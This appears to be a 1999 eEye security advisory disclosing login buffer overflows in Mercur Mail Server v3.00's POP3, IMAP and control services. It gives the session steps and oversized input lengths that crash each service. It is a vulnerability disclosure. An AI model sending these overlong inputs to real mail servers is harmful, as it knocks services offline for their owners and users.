[INLINE] [INLINE]
   [INLINE] eEyelogosmall
   Home Hire News Alerts Articles Books Tools Links Contact Press 
   [INLINE] [INLINE] [INLINE]
   
   eEye - Digital Security Team Alert
   
   Multiple Vulnerabilites in Mercur Mail Server
   Systems Affected
   Mercur v3.00
   Release Date
   February 21, 1999
   Advisory Code
   AD02211999
   Description:
   There are multiple places in Mercur where they do not use proper bounds checking. The following all
   result in a Denial of Service against the service in question.
   The pop3 (110) service has an overflow in the login function.
   +OK MERCUR POP3-Server (v3.00.24 Unregistered) for Windows NT ready at Sun,
   21 Feb 1999  22:05:28 -0800
   user touchmyspecialspot
   +OK <touchmyspecialspot>
   pass glob
   Where glob is 2400 characters. It could work with less or more.
   The imapd (143) service has an overflow in the login process as well.
   OK MERCUR IMAP4-Server (v3.00.26 Unregistered) for Windows NT ready at
   Sun, 21 Feb 1999  22:12:30 -0800
   x login glob1 glob2
   Where glob1 is 300 characters and glob2 is 400 characters. Once again diffrent lengths will work.
   The Administrative Control service (32000) also has a login overflow.
   MERCUR Control-Service (v3.00.21 Unregistered) for Windows NT ready at Sun,
   21 Feb 1999  22:16:54 -0800
   Username: blah
   Password: glob
   Where glob is 900 characters. Once again size may vary.
   Vendor Status
   Vendor was contacted a week ago, Waiting for a response :-(
   Copyright (c) 1999 eEye Digital Security Team
   
   Permission is hereby granted for the redistribution of this alert electronically. It is not to be
   edited in any way without express consent of eEye. If you wish to reprint the whole or any part of
   this alert in any other medium excluding electronic medium, please e-mail alert@eEye.com for
   permission.
   
   Disclaimer:
   
   The information within this paper may change without notice. Use of this information constitutes
   acceptance for use in an AS IS condition. There are NO warranties with regard to this information.
   In no event shall the author be liable for any damages whatsoever arising out of or in connection
   with the use or spread of this information. Any use of this information is at the user's own risk.
   
   Please send suggestions, updates, and comments to:
   
   eEye Digital Security Team
   
   info@eEye.com
   http://www.eEye.com
   [INLINE]
   [LINK] 
   [INLINE]
   
        Copyright © 1998-1999 eEye.com - All Rights Reserved. eEye is an www.eCompany.com Venture.